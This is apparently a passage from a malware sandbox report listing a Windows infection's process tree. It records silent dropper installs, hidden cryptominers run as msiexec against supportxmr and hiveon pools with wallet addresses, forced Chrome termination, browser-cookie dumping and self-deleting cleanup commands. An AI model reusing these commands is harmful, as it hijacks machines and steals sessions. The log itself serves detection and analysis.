        C:\Users\Admin\AppData\Local\Temp\is-L50B0.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L50B0.tmp\irecord.tmp" /SL5="$4029E,6265333,408064,C:\Program Files\Mozilla Firefox\IWGDBZBXCX\irecord.exe" /VERYSILENT
        15⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\8f-1f6cc-4e3-6adb4-1bdbf4a0126bf\Ripofiviju.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8f-1f6cc-4e3-6adb4-1bdbf4a0126bf\Ripofiviju.exe"
        14⤵
        
        PID:4628
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snwisd02.wmm\md6_6ydj.exe & exit
        15⤵
        
        PID:476
        
        C:\Users\Admin\AppData\Local\Temp\snwisd02.wmm\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\snwisd02.wmm\md6_6ydj.exe
        16⤵
        
        PID:940
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cpfktosy.mkh\askinstall31.exe & exit
        15⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\cpfktosy.mkh\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\cpfktosy.mkh\askinstall31.exe
        16⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:6756
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4noi2kle.sdj\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:7024
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe & exit
        15⤵
        
        PID:6600
        
        C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe
        16⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\rwklcoqu.ylw\toolspab1.exe
        17⤵
        
        PID:804
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gj4f5ioc.g2l\setup_10.2_mix.exe & exit
        15⤵
        
        PID:8148
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfqrtao3.uly\file.exe & exit
        15⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\gfqrtao3.uly\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\gfqrtao3.uly\file.exe
        16⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
        17⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe" 1 3.1617560834.606a0502bb084 101
        19⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ZVQO7O2XI\multitimer.exe" 2 3.1617560834.606a0502bb084
        20⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\lm2n5jnuvh3\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lm2n5jnuvh3\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:5624
        
        C:\Users\Admin\AppData\Local\Temp\is-LSOG0.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LSOG0.tmp\Setup3310.tmp" /SL5="$B0352,138429,56832,C:\Users\Admin\AppData\Local\Temp\lm2n5jnuvh3\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\is-5N3K8.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5N3K8.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:8972
        
        C:\Users\Admin\AppData\Local\Temp\zb1omnwl5mw\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zb1omnwl5mw\app.exe" /8-23
        21⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Local\Temp\aano405toc5\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\aano405toc5\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:6048
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:8352
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:8520
        
        C:\Users\Admin\AppData\Local\Temp\cj44shdszrk\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cj44shdszrk\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\is-3BKIF.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3BKIF.tmp\vict.tmp" /SL5="$C02DE,870426,780800,C:\Users\Admin\AppData\Local\Temp\cj44shdszrk\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\is-TV3RA.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-TV3RA.tmp\win1host.exe" 535
        23⤵
        
        PID:8464
        
        C:\Users\Admin\AppData\Local\Temp\xqunrxhzimf\i1szggspaax.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xqunrxhzimf\i1szggspaax.exe" /ustwo INSTALL
        21⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\41RRLKT8OO\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\41RRLKT8OO\setups.exe" ll
        18⤵
        
        PID:7864
        
        C:\Users\Admin\AppData\Local\Temp\is-990EI.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-990EI.tmp\setups.tmp" /SL5="$305AC,454998,229376,C:\Users\Admin\AppData\Local\Temp\41RRLKT8OO\setups.exe" ll
        19⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
        17⤵
        
        PID:8040
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:6196
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
        17⤵
        
        PID:6432
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        17⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Roaming\42D8.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\42D8.tmp.exe"
        18⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Roaming\3FDA.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\3FDA.tmp.exe"
        18⤵
        
        PID:5624
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w5285 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:7416
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w13507@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:6288
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        18⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:8360
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
        17⤵
        
        PID:6372
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jj1sea4l.f5h\app.exe /8-2222 & exit
        15⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\jj1sea4l.f5h\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\jj1sea4l.f5h\app.exe /8-2222
        16⤵
        
        PID:6828
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wjko5zm.jdx\Four.exe & exit
        15⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Local\Temp\5wjko5zm.jdx\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\5wjko5zm.jdx\Four.exe
        16⤵
        
        PID:8960
        
        C:\Users\Admin\AppData\Local\Temp\8d-af2ef-99f-e6086-4f355d4dedbde\Vikicyqogy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8d-af2ef-99f-e6086-4f355d4dedbde\Vikicyqogy.exe"
        14⤵
        
        PID:5764
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:2012
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:6024
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"
        11⤵
        
        PID:5476
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:4692
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe" 1 3.1617560700.606a047c4acf0 103
        13⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A0KPINSJKA\multitimer.exe" 2 3.1617560700.606a047c4acf0
        14⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\im1rbhghwsm\szboepf3njv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\im1rbhghwsm\szboepf3njv.exe" /ustwo INSTALL
        15⤵
        
        PID:6184
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "szboepf3njv.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\im1rbhghwsm\szboepf3njv.exe" & exit
        16⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "szboepf3njv.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\rkwt1n3ytrz\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rkwt1n3ytrz\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:6216
        
        C:\Users\Admin\AppData\Local\Temp\is-UNK3C.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UNK3C.tmp\Setup3310.tmp" /SL5="$70296,138429,56832,C:\Users\Admin\AppData\Local\Temp\rkwt1n3ytrz\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\is-0DCC7.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0DCC7.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:6456
        
        C:\Users\Admin\AppData\Local\Temp\43uwmvbktwv\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\43uwmvbktwv\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\is-I1IMS.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I1IMS.tmp\vict.tmp" /SL5="$4037C,870426,780800,C:\Users\Admin\AppData\Local\Temp\43uwmvbktwv\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\is-DQFSJ.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DQFSJ.tmp\win1host.exe" 535
        17⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\yufbngzsmsj\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yufbngzsmsj\app.exe" /8-23
        15⤵
        
        PID:6552
        
        C:\Users\Admin\AppData\Local\Temp\ocunfqt1vzp\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ocunfqt1vzp\vpn.exe" /silent /subid=482
        15⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\is-QPGS5.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QPGS5.tmp\vpn.tmp" /SL5="$702FC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ocunfqt1vzp\vpn.exe" /silent /subid=482
        16⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\3qiuxb3sxoj\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3qiuxb3sxoj\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        17⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:6980
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\8ZZV2QJ5ON\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8ZZV2QJ5ON\setups.exe" ll
        12⤵
        
        PID:5436
        
        C:\Users\Admin\AppData\Local\Temp\is-99R65.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-99R65.tmp\setups.tmp" /SL5="$90138,454998,229376,C:\Users\Admin\AppData\Local\Temp\8ZZV2QJ5ON\setups.exe" ll
        13⤵
        
        PID:5720
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\erezwwg3i4s\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\erezwwg3i4s\vpn.exe" /silent /subid=482
        8⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\is-795U3.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-795U3.tmp\vpn.tmp" /SL5="$202CE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\erezwwg3i4s\vpn.exe" /silent /subid=482
        9⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:4224
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:3084
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:2548
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:7816
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:8180
        
        C:\Users\Admin\AppData\Local\Temp\if2t45oqm5a\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\if2t45oqm5a\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\is-I2LKK.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I2LKK.tmp\IBInstaller_97039.tmp" /SL5="$202AA,14575146,721408,C:\Users\Admin\AppData\Local\Temp\if2t45oqm5a\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-L1JTL.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-L1JTL.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\1pjbt2roasz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\1pjbt2roasz.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\1pjbt2roasz.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pczxidfgqxh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617301089 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\hfun0f1lgcb\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hfun0f1lgcb\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\ojwqmossmjm\xfjdenofpfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ojwqmossmjm\xfjdenofpfx.exe"
        8⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ojwqmossmjm\xfjdenofpfx.exe"
        9⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:4760
    - - C:\Users\Admin\AppData\Local\Temp\TG2XKYFGOM\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TG2XKYFGOM\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1784
      - C:\Users\Admin\AppData\Local\Temp\is-NEQ8L.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NEQ8L.tmp\setups.tmp" /SL5="$4013C,454998,229376,C:\Users\Admin\AppData\Local\Temp\TG2XKYFGOM\setups.exe" ll
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4036
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4032
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4044
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:812
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"
      4⤵
      PID:4504
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:4648
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:4792
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      PID:4704
    - - C:\Users\Admin\AppData\Roaming\44BA.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\44BA.tmp.exe"
        5⤵
        
        PID:2736
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w4645 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:4620
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w3971@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:4084
    - - C:\Users\Admin\AppData\Roaming\4671.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\4671.tmp.exe"
        5⤵
        
        PID:4764
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\4671.tmp.exe
        6⤵
        
        PID:6988
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6508
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        
        PID:4488
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:1668
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      PID:4344
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      PID:5708
    - - C:\ProgramData\5438239.exe
        
        "C:\ProgramData\5438239.exe"
        5⤵
        
        PID:6692
    - - C:\ProgramData\141477.exe
        
        "C:\ProgramData\141477.exe"
        5⤵
        
        PID:5376
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        
        PID:6584
    - - C:\ProgramData\6536977.exe
        
        "C:\ProgramData\6536977.exe"
        5⤵
        
        PID:7108
      - C:\ProgramData\6536977.exe
        
        "{path}"
        6⤵
        
        PID:8116
    - - C:\ProgramData\4408264.exe
        
        "C:\ProgramData\4408264.exe"
        5⤵
        
        PID:6208
      - C:\ProgramData\4408264.exe
        
        "{path}"
        6⤵
        
        PID:7676
      - C:\ProgramData\4408264.exe
        
        "{path}"
        6⤵
        
        PID:7728
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
      4⤵
      PID:4856
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:4564
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:7928

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4020

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:2464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4888

C:\Users\Admin\AppData\Local\Temp\is-OK414.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OK414.tmp\vict.tmp" /SL5="$402BE,870426,780800,C:\Users\Admin\AppData\Local\Temp\hfun0f1lgcb\vict.exe" /VERYSILENT /id=535
1⤵
PID:3788
- C:\Users\Admin\AppData\Local\Temp\is-G4JST.tmp\win1host.exe
  "C:\Users\Admin\AppData\Local\Temp\is-G4JST.tmp\win1host.exe" 535
  2⤵
  PID:5060
- - C:\Users\Admin\AppData\Local\Temp\5Uca2fsrj.exe
    "C:\Users\Admin\AppData\Local\Temp\5Uca2fsrj.exe"
    3⤵
    PID:7652
  - - C:\Windows\SysWOW64\at.exe
      "C:\Windows\System32\at.exe"
      4⤵
      PID:7700
  - - C:\Windows\SysWOW64\cmd.exe
